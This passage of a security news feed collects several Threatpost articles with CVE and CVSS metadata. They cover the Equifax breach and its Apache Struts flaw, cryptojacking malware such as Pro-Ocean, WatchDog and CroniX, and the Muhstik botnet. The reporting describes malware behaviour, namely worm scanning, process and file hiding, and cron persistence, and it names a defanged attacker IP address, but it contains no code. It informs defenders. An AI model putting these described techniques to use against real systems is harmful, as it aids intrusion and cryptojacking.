bug](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), said it was being exploited in the wild when it was disclosed.\n\nResearchers with Contrast Security posit it\u2019s more likely the attacker used CVE-2017-5638, an expression language injection vulnerability leveraged via the content-type header, to hit Equifax.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Jeff Williams, Contrast\u2019s co-founder and chief technology officer, [wrote Saturday](<https://www.contrastsecurity.com/security-influencers/a-week-of-web-application-hacks-and-vulnerabilities>).\n\nWilliams echoed a few sentiments made by Gielen, including the fact that maintaining the security of libraries can be tricky but should remain a focus for businesses.\n\n\u201cKeeping libraries up to date isn\u2019t a small amount of work, as these changes come out frequently. Often these changes require rewriting, retesting, and redeploying the application, which can take months. I have recently talked with several large organizations that took over four months to deal with CVE-2017-5638,\u201d Williams said.\n\nEquifax, which has yet to respond to a request for comment for this article or [previous](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) [articles](<https://threatpost.com/many-questions-few-answers-for-equifax-breach-victims/127886/>), remains in damage control mode.\n\nThe company on Monday said it would be changing how it generates PINs for customers who want to initiate a security freeze on their accounts. The response was presumably in response to a series of tweets that went viral on Friday night calling out Equifax for using hardcoded PINs that mirrored the date and time they were requested, a format the company allegedly has followed for more than a decade.\n\n> OMG, Equifax security freeze PINs are worse than I thought. If you froze your credit today 2:15pm ET for example, you'd get PIN 0908171415.\n> \n> \u2014 Tony Webster (@webster) [September 9, 2017](<https://twitter.com/webster/status/906346071210778625>)\n\nThe company said in an update to its site that going forward consumers placing a security freeze will be given a randomly generated PIN. Users who previously froze their credit will have to mail the company directly to change it, however.\n\n> Equifax's security freeze system is now generating random PINs. If you already got one though, you have to MAIL them to change it. Fail. [pic.twitter.com/fOrtvgkmGd](<https://t.co/fOrtvgkmGd>)\n> \n> \u2014 Tony Webster (@webster) [September 11, 2017](<https://twitter.com/webster/status/907242378829889537>)\n\nThe company on Monday also apologized for lengthy call center wait times and stressed that users who sign up for TrustedID Premier, the company\u2019s ID theft protection and credit monitoring service, will not be charged as soon as the year runs out.\n\nThe company also took a moment on Monday to reiterate that signing up for the free credit monitoring service doesn\u2019t waive a consumer\u2019s right to take legal action.\n\nThe company clarified its TrustedID Premier policy on Friday afternoon after it was pressed repeated by consumers and politicians alike. One politician in particular, Eric Schneiderman, New York\u2019s Attorney General, opened a formal investigation into the breach on Friday, calling out the company\u2019s arbitration clause policy.\n\nAs expected multiple lawsuits have been filed against the company in wake of the breach. One class action suit, filed late Thursday night, alleges Equifax \u201cnegligently failed to maintain adequate technological safeguards to protect [the plaintiffs\u2019] information from unauthorized access by hackers.\u201d The suit seeks as much as $70 billion in damages nationally.\n\n\u201cEquifax knew and should have known that failure to maintain adequate technological safeguards would eventually result in a massive data breach,\u201d the complaint also reads.\n\n_*This article was updated at 5 p.m. to include insight from Contrast Security re: CVE-2017-5638 and Equifax._\n", "cvss3": {}, "published": "2017-09-11T15:02:31", "type": "threatpost", "title": "Apache Foundation Refutes Involvement in Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-20T19:57:18", "id": "THREATPOST:477B6029652B76463B5C5B7155CDF736", "href": "https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-01-28T21:55:45", "description": "Researchers have identified an updated malware variant used by the cybercrime gang Rocke Group that targets cloud infrastructures with crypto-jacking attacks.\n\nThe malware is called Pro-Ocean, which was first discovered in 2019, and has now been beefed-up with \u201cworm\u201d capabilities and rootkit detection-evasion features.\n\n\u201cThis malware is an example that demonstrates that cloud providers\u2019 agent-based security solutions may not be enough to prevent evasive malware targeted at public cloud infrastructure,\u201d said Aviv Sasson with Palo Alto Networks [on Thursday](<https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/>). \u201cAs we saw, this sample has the capability to delete some cloud providers\u2019 agents and evade their detection.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nSince [its discovery in 2018](<https://threatpost.com/new-threat-actor-rocke-a-rising-monero-cryptomining-menace/137090/>), the Rocke Group has widened its [targeting of cloud applications](<https://threatpost.com/cryptomining-malware-uninstalls-cloud-security-products/140959/>) \u2013 including Apache ActiveMQ, Oracle WebLogic and open-source data structure store Redis \u2013 for mining Monero. Researchers say that since these attacks initially broke out, many cybersecurity companies have kept Pro-Ocean on their radar. Rocke Group\u2019s latest update aims to sidestep these detection and mitigation efforts.\n\n## **Pro-Ocean Malware**\n\nPro-Ocean uses a variety of known vulnerabilities to target cloud applications. These include a [critical flaw in Apache ActiveMQ](<https://nvd.nist.gov/vuln/detail/CVE-2016-3088>) (CVE-2016-3088) and [a high-severity vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>) in Oracle WebLogic (CVE-2017-10271). The malware has also been spotted targeting unsecure instances of Redis.\n\nOnce downloaded, the malware attempts to remove other malware and cryptominers, including [Luoxk](<https://blog.netlab.360.com/malicious-campaign-luoxk-is-actively-exploiting-cve-2018-2893/>), [BillGates](<https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf>), [XMRig](<https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/>) and [Hashfish](<https://virus-removal-guide.net/34710-is-the-hashfish-exe-file-legal-how-to-remove-hashfish-exe-trojan-coinminer/>). It then kills any processes using the CPU heavily, so that its XMRig miner can utilize 100 percent of the CPU juice needed to sow Monero.\n\nThe malware is made up of four components: A rootkit module that installs a rootkit and other various malicious services; a mining module that runs the XMRig miner; a Watchdog module that executes two Bash scripts (these check that the malware is running and search any processes using CPU heavily); and an infection module that contains \u201cworm\u201d capabilities.\n\n## **New Features**\n\nThe latter \u201cworm\u201d feature is a new add for Pro-Ocean, which previously only infected victims manually. The malware now uses a Python infection script to retrieve the public IP address of the victim\u2019s machine. It does so by accessing an online service with the address \u201cident.me,\u201d which scopes out IP addresses for various web servers. Then, the script tries to infect all the machines in the same 16-bit subnet (e.g. 10.0.X.X).\n\n\u201cIt does this by blindly executing public exploits one after the other in the hope of finding unpatched software it can exploit,\u201d said Sasson.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/01/28143636/word-image-4.png>)\n\nPro-Ocean\u2019s modular structure. Credit: Palo Alto Networks\n\nOther threat groups have previously adopted worm-like functionality into their Monero-chugging malware. TeamTNT\u2019s cryptomining worm, for instance, [was found spreading through](<https://threatpost.com/aws-cryptojacking-worm-cloud/158427/>) the Amazon Web Services (AWS) cloud and collecting credentials in August.\n\nThe Pro-Ocean malware has also added mew rootkit capabilities that cloak its malicious activity.\n\nThese updated features exist in [Libprocesshider](<https://github.com/gianlucaborello/libprocesshider>), a library for hiding processes used by the malware. This library was utilized by previous versions of Pro-Ocean \u2013 however, in the new version, the developer of the code has added several new code snippets to the library for further functionalities.\n\nFor example, before calling the libc function open (libc is a library of standard functions that can be used by all C programs), a malicious function determines whether the file needs to be hidden to obfuscate malicious activities.\n\n\u201cIf it determines that the file needs to be hidden, the malicious function will return a \u2018No such file or directory\u2019 error, as if the file in question does not exist,\u201d said Sasson.\n\nResearchers said they believe that the Rocke Group will continue to actively update its malware, particularly as the [cloud grows as a lucrative target for attackers](<https://threatpost.com/cloud-attacks-bypass-mfa-feds/163056/>).\n\n\u201cCryptojacking malware targeting the cloud is evolving as attackers understand the potential of that environment to mine for crypto coins. We previously saw simpler attacks by the Rocke Group, but it seems this group presents an ongoing, growing threat. This cloud-targeted malware is not something ordinary since it has worm and rootkit capabilities. We can assume that the growing trend of sophisticated attacks on the cloud will continue.\u201d\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) [_**Healthcare Security Woes Balloon in a Covid-Era World**_](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** , sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)**\u2013 on us!**\n", "cvss3": {}, "published": "2021-01-28T20:06:57", "type": "threatpost", "title": "Rocke Group\u2019s Malware Now Has Worm Capabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-3088", "CVE-2017-10271", "CVE-2018-2893"], "modified": "2021-01-28T20:06:57", "id": "THREATPOST:D3FA06D667A0B326C1598C8BCD106E7D", "href": "https://threatpost.com/rocke-groups-malware-now-has-worm-capabilities/163463/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-17T21:39:31", "description": "Cryptocurrency-mining malware, called WatchDog, has been running under the radar for more than two years \u2013 in what researchers call one of the largest and longest-lasting Monero cryptojacking attacks to date.\n\n[](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)\n\nClick to Register\n\nThe attack is still in operation as of this writing \u2013 and due to the size and scope of the infrastructure, it will be difficult to fully contain, researchers told Threatpost. Thus far, attackers have hijacked at least 476 Windows and Linux devices, in order to abuse their system resources for mining Monero cryptocurrency.\n\nRight now, the attackers behind this campaign are sticking to cryptojacking \u2013 but researchers warn that it is \u201chighly likely\u201d they could find identity and access management (IAM) data on previously-compromised cloud systems, due to the root and administrative access that\u2019s acquired during the malware implantation. This could open the door for future \u2013 and more dangerous \u2013 attacks.\n\n\u201cIt is clear that the WatchDog operators are skilled coders and have enjoyed a relative lack of attention regarding their mining operations,\u201d said researchers with Palo Alto Networks [on Wednesday](<https://unit42.paloaltonetworks.com/watchdog-cryptojacking/>). \u201cWhile there is currently no indication of additional cloud compromising activity at present (i.e. the capturing of cloud platform identity and access management credentials, access ID or keys), there could be potential for further cloud account compromise.\u201d\n\n## **How Much Money Does Cryptomining Malware Make? **\n\nThe attack is a [prime example of cryptojacking](<https://threatpost.com/cryptojacking-attack-found-on-los-angeles-times-website/130041/>), which is when attackers leverage malicious cryptomining for financial profit. They do so by hacking into devices to install software, which then uses the devices\u2019 power and resources to mine for cryptocurrencies or to steal cryptocurrency wallets owned by the victims.\n\nSince it launched on Jan. 27, 2019, the WatchDog mining operation has collected at least 209 Monero cryptocurrency coins (XMR) \u2013 which is currently valued at $32,056. While this figure appears to be relatively low, the important piece of cryptojacking operations is not the immediate market price, but the total XMR mined, Nathaniel Quist, senior cloud threat researcher for Unit 42 at Palo Alto Networks, told Threatpost.\n\nAt the time of writing the research, the market price for Monero was $153. But, just within the last 24 hours, the market price of XMR has soared to $254, Quist explained \u2013 so as of Wednesday, WatchDog has actually collected $53,086.\n\n\u201cIn the past, we have seen dramatic swings in cryptocurrency valuations,\u201d Quist told Threatpost. \u201cDepending upon the market price over the next months, we could see cryptocurrency market prices touch the record highs that were seen back in early 2018, where Monero was valued at $469. If that were the case, WatchDog could increase its value total to $98,021 without mining another coin, making it a very profitable mining operation.\u201d\n\n## **WatchDog Malware: Go Binaries Drive Functionality**\n\nResearchers said, the WatchDog mining malware is composed of a three-part Go Language binary set and a bash or PowerShell script file. Go, an open-source programming language, has previously been utilized by various cybercriminals for various cryptojacking attacks, [including TeamTNT](<https://threatpost.com/blackt-cryptojacker-teamtnt/159853/>) and [the developers of ElectroRAT](<https://threatpost.com/electrorat-drains-cryptocurrency-wallet-funds-of-thousands/162705/>).\n\nWatchDog\u2019s Go binaries each perform a specific functionality \u2013 including one that emulates the Linux watchdog daemon functionality (hence the name of the malware, WatchDog) by ensuring that the mining process does not overload or stop unexpectedly. The watchdog daemon\u2019s functionality is to open the device and provide a necessary refresh to keep the system from resetting. For example, it can test process table space, memory usage and running processes.\n\n\u201cWatchDog\u2019s usage of Go binaries allows it to perform the stated operations across different operating systems using the same binaries\u2026 as long as the Go Language platform is installed on the target system,\u201d said researchers.\n\nThe Go binaries include a network scanner and exploitation binary (networkmanager), a process monitoring binary (phpguard), and a version of the malicious XMRig cryptomining software (phpupdate).\n\n## **The WatchDog Cryptojacking Campaign: Windows and Linux OS Under Attack**\n\nThe initial attack vector stems from the networkmanager binary. When the binary identifies a vulnerable target, it attempts to compromise that identified system using a robust set of built-in application exploits.\n\nSpecifically, networkmanager comes loaded with 33 exploits, 32 individual remote code execution (RCE) functions and several shell grab functions. For instance, it scans for applications such as Elasticsearch servers that are vulnerable to CVE-2015-1427 and CVE-2014-3120 and Oracle WebLogic Servers vulnerable to CVE-2017-10271.\n\nFor context, this is a significant amount of exploits when compared to other miners \u2013 [such as the Smominru cryptocurrency miner](<https://threatpost.com/massive-smominru-cryptocurrency-botnet-rakes-in-millions/129726/>), which operated from 2017 to 2018 and collected nearly 9,000 XMR, said Quist. Unlike Smominru\u2019s two exploits, WatchDog\u2019s numerous exploits and RCE functions \u201cmake it better at compromising exposed systems,\u201d he told Threatpost.\n\n## **WatchDog Compared to Graboid Cryptomining Malware**\n\nOf note, WatchDog is stealthier than other cryptomining malware, such as the wormable [Monero mining malware Graboid](<https://threatpost.com/docker-containers-graboid-crypto-worm/149235/>). Discovered last year, Graboid was the largest known mining operation to date in terms of the total number of active systems.\n\nDuring the time of its operation, Graboid consisted of at least 2,000 exposed and compromised Docker Daemon APIs systems, and researchers said the malware could have also achieved \u201chigher processing speeds\u201d due to the configuration script utilizing all available container central processing units (CPUs).\n\nHowever, Graboid was only known to operate for up to three months before its Docker Hub images were removed. That\u2019s because the malware relied on a third-party (Docker Hub) to host its malicious payload \u2013 whereas WatchDog does not, allowing it to have remained active for more than two years, said researchers.\n\nIn fact, WatchDog has a fairly extensive infrastructure behind its mining operations, with researchers mapping out 18 root IP endpoints and seven malicious domains, which serve at least 125 malicious URL addresses used to download its toolset.\n\n## **Cryptojacking: A Cyberattack on the Rise**\n\nWatchDog comes as the value of cryptocurrency has exploded, making cryptojacking a lucrative type of financial attack for cybercriminals. The XMR market value follows the cryptocurrency prices of Bitcoin \u2013 which as of Wednesday set a record-high topping $51,000.\n\nXMR has subsequently increased in value from $153 on February 9 to $254 on Wednesday \u2013 approaching its highest-recorded value of $469.79 (set in January 2018), Quist told Threatpost.\n\n\u201cCybercriminals are watching the market value of XMR,\u201d Quist told Threatpost. \u201cOver the last six months, Unit 42 researchers have seen a 40 percent increase in network traffic to public mining pools, which indicates that more mining operations are taking place. The trend of more XMR mining operations appears to be following the increasing market value price of XMR.\u201d\n\nThis week, researchers with Kaspersky also found that distributed denial-of-service (DDoS) attacks dropped significantly at the end of 2020, down 31 percent in the fourth quarter, as cybercriminals switch their efforts to cryptomining. [According to the analysis this week](<https://threatpost.com/ddos-attacks-q4-cryptomining-resurgence/163998/>), cybercriminals began repurposing infected devices for cryptomining in response to rising cryptocurrency values.\n\nOne such [recently discovered malware](<https://threatpost.com/new-malware-hijacks-kubernetes-clusters-to-mine-monero/163629/>), dubbed Hildegard, was found being leveraged by the TeamTNT threat group to target Kubernetes clusters with cryptojacking attacks. In January, [researchers also identified an updated malware variant](<https://threatpost.com/rocke-groups-malware-now-has-worm-capabilities/163463/>) used by the cybercrime gang Rocke Group that targets cloud infrastructures with crypto-jacking attacks. And, in January, [researchers dug up new discoveries](<https://threatpost.com/sql-server-malware-tied-to-iranian-software-firm-researchers-allege/163230/>) surrounding a cryptomining operation, called MrbMiner, which was downloading a cryptominer on thousands of internet-facing SQL servers.\n\n### _Is your small- to medium-sized business an easy mark for attackers?_\n\n**Threatpost WEBINAR:** _ Save your spot for __\u201c**15 Cybersecurity Pitfalls and Fixes for SMBs**__,\u201d a _[**_FREE Threatpost webinar_**](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)** _on Feb. 24 at 2 p.m. ET._**_ Cybercriminals count on you making these mistakes, but our experts will help you lock down your small- to mid-sized business like it was a Fortune 100. _[_Register NOW_](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)_ for this _**_LIVE_****_ _**_webinar on Wed., Feb. 24._\n", "cvss3": {}, "published": "2021-02-17T21:39:10", "type": "threatpost", "title": "Windows, Linux Devices Hijacked In Two-Year Cryptojacking Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271"], "modified": "2021-02-17T21:39:10", "id": "THREATPOST:555BCC102B10B8C6CABB0054595AC756", "href": "https://threatpost.com/windows-linux-devices-hijacked-in-two-year-cryptojacking-campaign/164048/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-08T11:51:46", "description": "UPDATE\n\nA variant of the Muhstik botnet has been uncovered in the wild, exploiting a recently-disclosed, dangerous vulnerability in Oracle WebLogic servers.\n\nThe newfound samples of Muhstik are targeting the [recently-patched CVE-2019-2725](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) in WebLogic servers, and then launching distributed-denial-of-service (DDoS) and cryptojacking attacks with the aim of making money for the attacker behind the botnet, researchers said.\n\n\u201cFrom the timeline, we can see that the developer of Muhstik watches aggressively for new Linux service vulnerability exploits and takes immediate action to [incorporate] exploits against them into the botnet,\u201d Cong Zheng and Yanhui Jia, researchers with Palo Alto Network\u2019s Unit 42 team, said in a [Tuesday analysis](<https://unit42.paloaltonetworks.com/muhstik-botnet-exploits-the-latest-weblogic-vulnerability-for-cryptomining-and-ddos-attacks/>). \u201cThis makes sense, because the faster the botnet includes the new exploits, the greater chance of successfully using the vulnerability to harvest more bots before systems are patched.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nOracle WebLogic is a popular server used for building and deploying enterprise applications. The server\u2019s flaw ([CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>)), meanwhile, has a CVSS score of 9.8 and is a remote code-execution (RCE) bug that is exploitable without authentication. Oracle patched the flaw on April 26.\n\nHowever, researchers first observed exploit traffic for the WebLogic vulnerability coming from three new Muhstik samples on April 28. Muhstik, which has been around since March 2018 and has wormlike self-propagating capabilities, is known to compromise Linux servers and IoT devices, and then launch cryptocurrency mining software and DDoS attacks.\n\nThey saw the exploit traffic being sent from the IP address 165.227.78[.]159, which was transmitting one shell command, to download a PHP webshell.\n\nInterestingly, that IP address (165.227.78[.]159) has previously been used by the Muhstik botnet as a mere reporting server to collect information on bots \u2013 but now, the IP address appears to also be used as a payload host server.\n\nThe discovery shows that new samples of the Muhstik botnet continue to sniff out ripe exploits. The botnet had previously targeted an earlier WebLogic vulnerability ([CVE-2017-10271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271>)), as well as WordPress and [Drupal vulnerabilities.](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>)\n\nUnit 42 researchers told Threatpost that they didn\u2019t have further information on the number of servers impacted.\n\n## Oracle WebLogic\n\nThe latest Oracle WebLogic flaw, which impacts versions 10.3.6 and 12.1.3 of the server, is one such ripe target.\n\nThe flaw could allow an attacker to send a request to a WebLogic server, which would then reach out to a malicious host to complete the request, opening up the impacted server to an remote code-execution attack.\n\nOracle for its part is urging users to update as soon as possible. \u201cDue to the severity of this vulnerability, Oracle recommends that this Security Alert be applied as soon as possible,\u201d Eric Maurice, director of security assurance at Oracle, said in a [recent post](<https://blogs.oracle.com/security/security-alert-cve-2019-2725-released>) about the vulnerability.\n\nOracle didn\u2019t respond to a request for further comment from Threatpost.\n\nHowever, servers that haven\u2019t yet updated are being targeted by several other bad actors, including ones spreading a new [ransomware variant](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) uncovered this week called \u201cSodinokibi.\u201d That ransomware first came onto researchers\u2019 radar on April 25 (the day before a patch was released), after attackers attempted to make an HTTP connection with vulnerable Oracle WebLogic servers.\n\nResearchers for their part warn of a slew of scans checking for the Oracle WebLogic vulnerability, and urge users to update their devices as soon as possible.\n\nhttps://twitter.com/bad_packets/status/1122356384849248258\n\nWhen it comes to Muhstik, Unit 42 researchers said that adding this latest exploit to the botnet\u2019s toolkit will increase the number of systems it can infect.\n\n\u201cThe Oracle WebLogic wls9-async RCE vulnerability is now being used by Muhstik botnet in the wild and there is a great possibility that it will be exploited by other malware families in the future,\u201d they said. \u201cUnder the pressure of racing with botnets, both service vendors and users should address new vulnerabilities by releasing patches and installing them respectively.\u201d\n\n_This article was updated on May 2 at 8 am ET to reflect Unit 42 comments._\n", "cvss3": {}, "published": "2019-05-01T14:11:11", "type": "threatpost", "title": "Muhstik Botnet Variant Targets Just-Patched Oracle WebLogic Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2019-2725", "CVE-2020-0688"], "modified": "2019-05-01T14:11:11", "id": "THREATPOST:420EE567E806D93092741D7BB375AC57", "href": "https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-10-30T07:20:19", "description": "The Apache Software Foundation warned in an advisory that the latest version of the Commons FileUpload library is susceptible to a two-year-old remote code execution flaw. Users of the vulnerable library must update their projects manually.\n\nThe critical bug in Commons FileUpload library is a known vulnerability ([CVE-2016-1000031](<http://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E>)) that enables remote code execution in the open-source framework, which facilitates developing web applications in the Java programming language.\n\nEssentially a Java Object exists in the Apache Commons FileUpload library that can be manipulated so that when it is deserialized, it can write or copy files to disk in arbitrary locations.\n\n\u201cA remote attacker could exploit this vulnerability to take control of an affected system,\u201d according to the Monday [advisory](<http://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E>). \u201cYour project is affected if it uses the built-in file upload mechanism of Struts 2, which defaults to the use of commons-fileupload. The updated commons-fileupload library is a drop-in replacement for the vulnerable version. Deployed applications can be hardened by replacing the commons-fileupload jar file in WEB-INF/lib with the fixed jar.\u201d\n\nThe vulnerable commons-fileupload library is used in Apache Struts versions 2.3.36 and prior, the Foundation said in a Monday advisory. They urged users to upgrade to the latest released version of Commons FileUpload library \u2013 which is 1.3.3.\n\nThe vulnerability is reminiscent of [CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>), another critical remote code execution Apache vulnerability behind the massive 2017 Equifax breach that led to the compromise of 143 million Americans\u2019 data.\n\nWhile that Apache Struts vulnerability (impacting the Jakarta based file upload Multipart parser) was patched back in March 2017, the consumer credit reporting agency didn\u2019t apply patches for two months after the flaw\u2019s disclosure \u2013 eventually leading to the groundbreaking breach.\n\nSimilarly, this latest deserialization vulnerability was disclosed and patched in commons-fileupload in [March,](<https://issues.apache.org/jira/browse/FILEUPLOAD-279>) but since then a new version of Struts that became available \u2013 the 2.3.36 version, which was released in October \u2013 has touted vulnerable versions of the library.\n\nStruts versions from 2.5.12 are not affected, as this newer version of Struts includes a patched commons-fileupload component.\n\nUsers can fix the risk by replacing the faulty library manually.\n\n\u201cThere is no simple \u2018new Struts version\u2019 to fix this,\u201d said Johannes Ullrich, dean of research at the SANS Institute, in a blog [post](<https://isc.sans.edu/diary/rss/24278>) on Monday. \u201cYou will have to swap out the commons-fileupload library manually.\u201d\n\n\u201cAnd while you are at it: Double check that you don\u2019t have any other copies of the vulnerable library sitting on your systems,\u201d he added. \u201cStruts isn\u2019t the only one using it, and others may have neglected to update it as well.\u201d\n\nIt is only the latest security issue to afflict Apache Struts \u2013 earlier in August for instance, a critical remote code-execution vulnerability in Apache Struts 2 was [disclosed](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>).\n", "cvss3": {}, "published": "2018-11-06T12:27:15", "type": "threatpost", "title": "Apache Struts Warns Users of Two-Year-Old Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-1000031", "CVE-2017-5638", "CVE-2019-11043"], "modified": "2018-11-06T12:27:15", "id": "THREATPOST:A45826A8CDA7058392C4901D6AAD15F1", "href": "https://threatpost.com/apache-struts-warns-users-of-two-year-old-vulnerability/138820/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-03T05:58:59", "description": "It was only a matter of time before attacks were seen in the wild, and now it\u2019s happened. A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. It uses a new malware designed for persistence and stealth, dubbed CroniX.\n\nThe malware\u2019s snappy name comes from the fact that it uses the Cron tool for persistence and Xhide for launching executables with fake process names, according to researchers at F5 Labs, who analyzed the campaign.\n\nThe Apache Struts 2 namespace vulnerability ([CVE-2018-11776](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>)) was disclosed just two weeks ago by researchers at Semmle. Researchers have warned that it has the potential to open the door to even more critical havoc than the bug at the root of the [infamous Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). That\u2019s quite a statement given that the attack resulted in the exposure of personally identifiable information (PII) of 147 million consumers, costing the Fortune 500 credit-reporting company more than $439 million in damages and leading to the resignation of several of its executives.\n\nThe new campaign makes use of one of the [proof-of-concept exploits](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) that were published on Github2 and Twitter just days after the latest flaw was publicized. Adversaries are using it to gain unauthenticated remote code-execution capabilities on targeted Linux machines in order to install a [Monero cryptomining script](<https://threatpost.com/?s=monero>), F5 researchers said.\n\n\u201cAs with many other Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which might contain malicious Java code that is evaluated under several circumstances,\u201d the team explained in [a posting](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) Tuesday. \u201cThis time, the injection point is within the URL. The attacker sends a single HTTP request while injecting an OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.\u201d\n\nThey added, \u201cconsidering it\u2019s only been two weeks since this vulnerability was discovered, it\u2019s worth noting how fast attackers are weaponizing vulnerabilities and how quickly researchers are seeing them in the wild.\u201d\n\n**Analysis**\n\nTaking a closer look at the malware, the team saw the malware downloads a file called \u201cH,\u201d which turns out to be an old XHide tool for launching executables with a fake process name, the researchers said. In this case, it launches a fork of the XMRig Monero miner, with an embedded configuration (pool, username and password), while changing the process name to the more innocuous-sounding \u201cjava.\u201d\n\nThe analysts also saw that three Cron jobs are used for persistence, with two of them refreshing the backdoor every day with downloads from the C2 server. Another job downloads a daily file named \u201canacrond,\u201d which saves itself in various Cron job files around the system. In all three cases, the scripts are used to connect to the C2 server and download the deployment bash script to restart the mining process; older versions of the scripts are then deleted off the system.\n\nCroniX also a competitive malware, locating and deleting the binaries of any previously installed cryptominers so as to claim all of the CPU resources for itself, F5 found.\n\n\u201cFor some miners, the attacker decides to take a more careful approach and check each process name and process CPU usage, and then kill only those processes that utilize 60 percent or more of the CPU resources,\u201d F5 researchers said. \u201cThis is probably done to avoid killing legitimate processes as the names of these miners (crond, sshd and syslogs) typically relate to legitimate programs on a Linux system.\u201d\n\nComparing the modus operandi of the operation, F5 researchers believe the actor is the same group that was behind a previous campaign exploiting Jenkins servers via [CVE-2017-1000353](<https://devcentral.f5.com/articles/jenkins-unsafe-deserialization-vulnerability-cve-2017-1000353-30142>). That campaign was uncovered two months ago.\n\n\u201cThe malware deployment pattern\u2026similar deployed file names and the quite unique usage of the XHide process-faker made us believe that the threat actor behind the exploitation of this fresh Struts 2 vulnerability is the same one,\u201d researchers noted in the analysis.\n\nOne difference is that in the previous campaign, the threat actor used a Chinese Git website to host malicious files. Here, the attackers are using a dedicated web server hosted in the U.S., along with domain names designating the Pacific island of Palau (.pw) \u2013 believed registered by a Russian registrant.\n\nWhile cryptomining can be seen as less destructive than [wiper malware,](<https://threatpost.com/secrets-of-the-wiper-inside-the-worlds-most-destructive-malware/131836/>) [ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) or Equifax-like [mass data exfiltration](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (all of which can be carried out using this flaw), Jeannie Warner, security manager at WhiteHat Security, noted that exploit development tends to be faster for more widely embedded flaws, highlighting the importance of patching this particular issue immediately.\n\n\u201cApache Struts is used by some of the world\u2019s largest companies,\u201d she said via email. \u201cThe more common the vulnerability, the more it helps attackers simplify their process\u2026and the easier it becomes for non-skilled hackers to compromise more websites. Methods to exploit this newest Struts vulnerability are already available online, so it is absolutely critical that all 